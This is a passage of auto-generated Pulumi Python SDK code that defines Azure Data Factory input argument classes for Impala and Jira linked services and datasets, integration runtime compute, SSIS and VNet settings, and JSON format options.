def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name when using UsernameAndPassword.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Impala server uses to listen for client connections. The default value is 21050.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name used to access the Impala server. The default value is anonymous when using SASLUsername.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class ImpalaObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Impala server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ImpalaObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class IntegrationRuntimeComputePropertiesArgs:
def __init__(__self__, *,
location: Optional[pulumi.Input[str]] = None,
max_parallel_executions_per_node: Optional[pulumi.Input[int]] = None,
node_size: Optional[pulumi.Input[str]] = None,
number_of_nodes: Optional[pulumi.Input[int]] = None,
v_net_properties: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']] = None):
"""
The compute resource properties for managed integration runtime.
:param pulumi.Input[str] location: The location for managed integration runtime. The supported regions could be found on https://docs.microsoft.com/en-us/azure/data-factory/data-factory-data-movement-activities
:param pulumi.Input[int] max_parallel_executions_per_node: Maximum parallel executions count per node for managed integration runtime.
:param pulumi.Input[str] node_size: The node size requirement to managed integration runtime.
:param pulumi.Input[int] number_of_nodes: The required number of nodes for managed integration runtime.
:param pulumi.Input['IntegrationRuntimeVNetPropertiesArgs'] v_net_properties: VNet properties for managed integration runtime.
"""
if location is not None:
pulumi.set(__self__, "location", location)
if max_parallel_executions_per_node is not None:
pulumi.set(__self__, "max_parallel_executions_per_node", max_parallel_executions_per_node)
if node_size is not None:
pulumi.set(__self__, "node_size", node_size)
if number_of_nodes is not None:
pulumi.set(__self__, "number_of_nodes", number_of_nodes)
if v_net_properties is not None:
pulumi.set(__self__, "v_net_properties", v_net_properties)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location for managed integration runtime. The supported regions could be found on https://docs.microsoft.com/en-us/azure/data-factory/data-factory-data-movement-activities
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="maxParallelExecutionsPerNode")
def max_parallel_executions_per_node(self) -> Optional[pulumi.Input[int]]:
"""
Maximum parallel executions count per node for managed integration runtime.
"""
return pulumi.get(self, "max_parallel_executions_per_node")
@max_parallel_executions_per_node.setter
def max_parallel_executions_per_node(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_parallel_executions_per_node", value)
@property
@pulumi.getter(name="nodeSize")
def node_size(self) -> Optional[pulumi.Input[str]]:
"""
The node size requirement to managed integration runtime.
"""
return pulumi.get(self, "node_size")
@node_size.setter
def node_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_size", value)
@property
@pulumi.getter(name="numberOfNodes")
def number_of_nodes(self) -> Optional[pulumi.Input[int]]:
"""
The required number of nodes for managed integration runtime.
"""
return pulumi.get(self, "number_of_nodes")
@number_of_nodes.setter
def number_of_nodes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "number_of_nodes", value)
@property
@pulumi.getter(name="vNetProperties")
def v_net_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]:
"""
VNet properties for managed integration runtime.
"""
return pulumi.get(self, "v_net_properties")
@v_net_properties.setter
def v_net_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeVNetPropertiesArgs']]):
pulumi.set(self, "v_net_properties", value)
@pulumi.input_type
class IntegrationRuntimeCustomSetupScriptPropertiesArgs:
def __init__(__self__, *,
blob_container_uri: Optional[pulumi.Input[str]] = None,
sas_token: Optional[pulumi.Input['SecureStringArgs']] = None):
"""
Custom setup script properties for a managed dedicated integration runtime.
:param pulumi.Input[str] blob_container_uri: The URI of the Azure blob container that contains the custom setup script.
:param pulumi.Input['SecureStringArgs'] sas_token: The SAS token of the Azure blob container.
"""
if blob_container_uri is not None:
pulumi.set(__self__, "blob_container_uri", blob_container_uri)
if sas_token is not None:
pulumi.set(__self__, "sas_token", sas_token)
@property
@pulumi.getter(name="blobContainerUri")
def blob_container_uri(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the Azure blob container that contains the custom setup script.
"""
return pulumi.get(self, "blob_container_uri")
@blob_container_uri.setter
def blob_container_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "blob_container_uri", value)
@property
@pulumi.getter(name="sasToken")
def sas_token(self) -> Optional[pulumi.Input['SecureStringArgs']]:
"""
The SAS token of the Azure blob container.
"""
return pulumi.get(self, "sas_token")
@sas_token.setter
def sas_token(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "sas_token", value)
@pulumi.input_type
class IntegrationRuntimeDataProxyPropertiesArgs:
def __init__(__self__, *,
connect_via: Optional[pulumi.Input['EntityReferenceArgs']] = None,
path: Optional[pulumi.Input[str]] = None,
staging_linked_service: Optional[pulumi.Input['EntityReferenceArgs']] = None):
"""
Data proxy properties for a managed dedicated integration runtime.
:param pulumi.Input['EntityReferenceArgs'] connect_via: The self-hosted integration runtime reference.
:param pulumi.Input[str] path: The path to contain the staged data in the Blob storage.
:param pulumi.Input['EntityReferenceArgs'] staging_linked_service: The staging linked service reference.
"""
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if path is not None:
pulumi.set(__self__, "path", path)
if staging_linked_service is not None:
pulumi.set(__self__, "staging_linked_service", staging_linked_service)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
"""
The self-hosted integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
The path to contain the staged data in the Blob storage.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter(name="stagingLinkedService")
def staging_linked_service(self) -> Optional[pulumi.Input['EntityReferenceArgs']]:
"""
The staging linked service reference.
"""
return pulumi.get(self, "staging_linked_service")
@staging_linked_service.setter
def staging_linked_service(self, value: Optional[pulumi.Input['EntityReferenceArgs']]):
pulumi.set(self, "staging_linked_service", value)
@pulumi.input_type
class IntegrationRuntimeReferenceArgs:
def __init__(__self__, *,
reference_name: pulumi.Input[str],
type: pulumi.Input[str],
parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Integration runtime reference type.
:param pulumi.Input[str] reference_name: Reference integration runtime name.
:param pulumi.Input[str] type: Type of integration runtime.
:param pulumi.Input[Mapping[str, Any]] parameters: Arguments for integration runtime.
"""
pulumi.set(__self__, "reference_name", reference_name)
pulumi.set(__self__, "type", type)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> pulumi.Input[str]:
"""
Reference integration runtime name.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: pulumi.Input[str]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of integration runtime.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Arguments for integration runtime.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class IntegrationRuntimeSsisCatalogInfoArgs:
def __init__(__self__, *,
catalog_admin_password: Optional[pulumi.Input['SecureStringArgs']] = None,
catalog_admin_user_name: Optional[pulumi.Input[str]] = None,
catalog_pricing_tier: Optional[pulumi.Input[str]] = None,
catalog_server_endpoint: Optional[pulumi.Input[str]] = None):
"""
Catalog information for managed dedicated integration runtime.
:param pulumi.Input['SecureStringArgs'] catalog_admin_password: The password of the administrator user account of the catalog database.
:param pulumi.Input[str] catalog_admin_user_name: The administrator user name of catalog database.
:param pulumi.Input[str] catalog_pricing_tier: The pricing tier for the catalog database. The valid values could be found in https://azure.microsoft.com/en-us/pricing/details/sql-database/
:param pulumi.Input[str] catalog_server_endpoint: The catalog database server URL.
"""
if catalog_admin_password is not None:
pulumi.set(__self__, "catalog_admin_password", catalog_admin_password)
if catalog_admin_user_name is not None:
pulumi.set(__self__, "catalog_admin_user_name", catalog_admin_user_name)
if catalog_pricing_tier is not None:
pulumi.set(__self__, "catalog_pricing_tier", catalog_pricing_tier)
if catalog_server_endpoint is not None:
pulumi.set(__self__, "catalog_server_endpoint", catalog_server_endpoint)
@property
@pulumi.getter(name="catalogAdminPassword")
def catalog_admin_password(self) -> Optional[pulumi.Input['SecureStringArgs']]:
"""
The password of the administrator user account of the catalog database.
"""
return pulumi.get(self, "catalog_admin_password")
@catalog_admin_password.setter
def catalog_admin_password(self, value: Optional[pulumi.Input['SecureStringArgs']]):
pulumi.set(self, "catalog_admin_password", value)
@property
@pulumi.getter(name="catalogAdminUserName")
def catalog_admin_user_name(self) -> Optional[pulumi.Input[str]]:
"""
The administrator user name of catalog database.
"""
return pulumi.get(self, "catalog_admin_user_name")
@catalog_admin_user_name.setter
def catalog_admin_user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_admin_user_name", value)
@property
@pulumi.getter(name="catalogPricingTier")
def catalog_pricing_tier(self) -> Optional[pulumi.Input[str]]:
"""
The pricing tier for the catalog database. The valid values could be found in https://azure.microsoft.com/en-us/pricing/details/sql-database/
"""
return pulumi.get(self, "catalog_pricing_tier")
@catalog_pricing_tier.setter
def catalog_pricing_tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_pricing_tier", value)
@property
@pulumi.getter(name="catalogServerEndpoint")
def catalog_server_endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The catalog database server URL.
"""
return pulumi.get(self, "catalog_server_endpoint")
@catalog_server_endpoint.setter
def catalog_server_endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "catalog_server_endpoint", value)
@pulumi.input_type
class IntegrationRuntimeSsisPropertiesArgs:
def __init__(__self__, *,
catalog_info: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']] = None,
custom_setup_script_properties: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']] = None,
data_proxy_properties: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']] = None,
edition: Optional[pulumi.Input[str]] = None,
license_type: Optional[pulumi.Input[str]] = None):
"""
SSIS properties for managed integration runtime.
:param pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs'] catalog_info: Catalog information for managed dedicated integration runtime.
:param pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs'] custom_setup_script_properties: Custom setup script properties for a managed dedicated integration runtime.
:param pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs'] data_proxy_properties: Data proxy properties for a managed dedicated integration runtime.
:param pulumi.Input[str] edition: The edition for the SSIS Integration Runtime
:param pulumi.Input[str] license_type: License type for bringing your own license scenario.
"""
if catalog_info is not None:
pulumi.set(__self__, "catalog_info", catalog_info)
if custom_setup_script_properties is not None:
pulumi.set(__self__, "custom_setup_script_properties", custom_setup_script_properties)
if data_proxy_properties is not None:
pulumi.set(__self__, "data_proxy_properties", data_proxy_properties)
if edition is not None:
pulumi.set(__self__, "edition", edition)
if license_type is not None:
pulumi.set(__self__, "license_type", license_type)
@property
@pulumi.getter(name="catalogInfo")
def catalog_info(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]:
"""
Catalog information for managed dedicated integration runtime.
"""
return pulumi.get(self, "catalog_info")
@catalog_info.setter
def catalog_info(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisCatalogInfoArgs']]):
pulumi.set(self, "catalog_info", value)
@property
@pulumi.getter(name="customSetupScriptProperties")
def custom_setup_script_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]:
"""
Custom setup script properties for a managed dedicated integration runtime.
"""
return pulumi.get(self, "custom_setup_script_properties")
@custom_setup_script_properties.setter
def custom_setup_script_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeCustomSetupScriptPropertiesArgs']]):
pulumi.set(self, "custom_setup_script_properties", value)
@property
@pulumi.getter(name="dataProxyProperties")
def data_proxy_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]:
"""
Data proxy properties for a managed dedicated integration runtime.
"""
return pulumi.get(self, "data_proxy_properties")
@data_proxy_properties.setter
def data_proxy_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeDataProxyPropertiesArgs']]):
pulumi.set(self, "data_proxy_properties", value)
@property
@pulumi.getter
def edition(self) -> Optional[pulumi.Input[str]]:
"""
The edition for the SSIS Integration Runtime
"""
return pulumi.get(self, "edition")
@edition.setter
def edition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "edition", value)
@property
@pulumi.getter(name="licenseType")
def license_type(self) -> Optional[pulumi.Input[str]]:
"""
License type for bringing your own license scenario.
"""
return pulumi.get(self, "license_type")
@license_type.setter
def license_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license_type", value)
@pulumi.input_type
class IntegrationRuntimeVNetPropertiesArgs:
def __init__(__self__, *,
subnet: Optional[pulumi.Input[str]] = None,
v_net_id: Optional[pulumi.Input[str]] = None):
"""
VNet properties for managed integration runtime.
:param pulumi.Input[str] subnet: The name of the subnet this integration runtime will join.
:param pulumi.Input[str] v_net_id: The ID of the VNet that this integration runtime will join.
"""
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
if v_net_id is not None:
pulumi.set(__self__, "v_net_id", v_net_id)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input[str]]:
"""
The name of the subnet this integration runtime will join.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter(name="vNetId")
def v_net_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VNet that this integration runtime will join.
"""
return pulumi.get(self, "v_net_id")
@v_net_id.setter
def v_net_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "v_net_id", value)
@pulumi.input_type
class JiraLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
username: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Jira Service linked service.
:param Any host: The IP address or host name of the Jira service. (e.g. jira.example.com)
:param pulumi.Input[str] type: Type of linked service.
:param Any username: The user name that you use to access Jira Service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name that you provided in the username field.
:param Any port: The TCP port that the Jira server uses to listen for client connections. The default value is 443 if connecting through HTTPS, or 8080 if connecting through HTTP.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Jira')
pulumi.set(__self__, "username", username)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the Jira service. (e.g. jira.example.com)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
The user name that you use to access Jira Service.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name that you provided in the username field.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Jira server uses to listen for client connections. The default value is 443 if connecting through HTTPS, or 8080 if connecting through HTTP.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class JiraObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Jira Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'JiraObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class JsonFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
deserializer: Optional[Any] = None,
encoding_name: Optional[Any] = None,
file_pattern: Optional[pulumi.Input[str]] = None,
json_node_reference: Optional[Any] = None,
json_path_definition: Optional[Any] = None,
nesting_separator: Optional[Any] = None,
serializer: Optional[Any] = None):
"""
The data stored in JSON format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any encoding_name: The code page name of the preferred encoding. If not provided, the default value is 'utf-8', unless the byte order mark (BOM) denotes another Unicode encoding. The full list of supported values can be found in the 'Name' column of the table of encodings in the following reference: https://go.microsoft.com/fwlink/?linkid=861078. Type: string (or Expression with resultType string).
:param pulumi.Input[str] file_pattern: File pattern of JSON. To be more specific, the way of separating a collection of JSON objects. The default value is 'setOfObjects'. It is case-sensitive.
:param Any json_node_reference: The JSONPath of the JSON array element to be flattened. Example: "$.ArrayPath". Type: string (or Expression with resultType string).
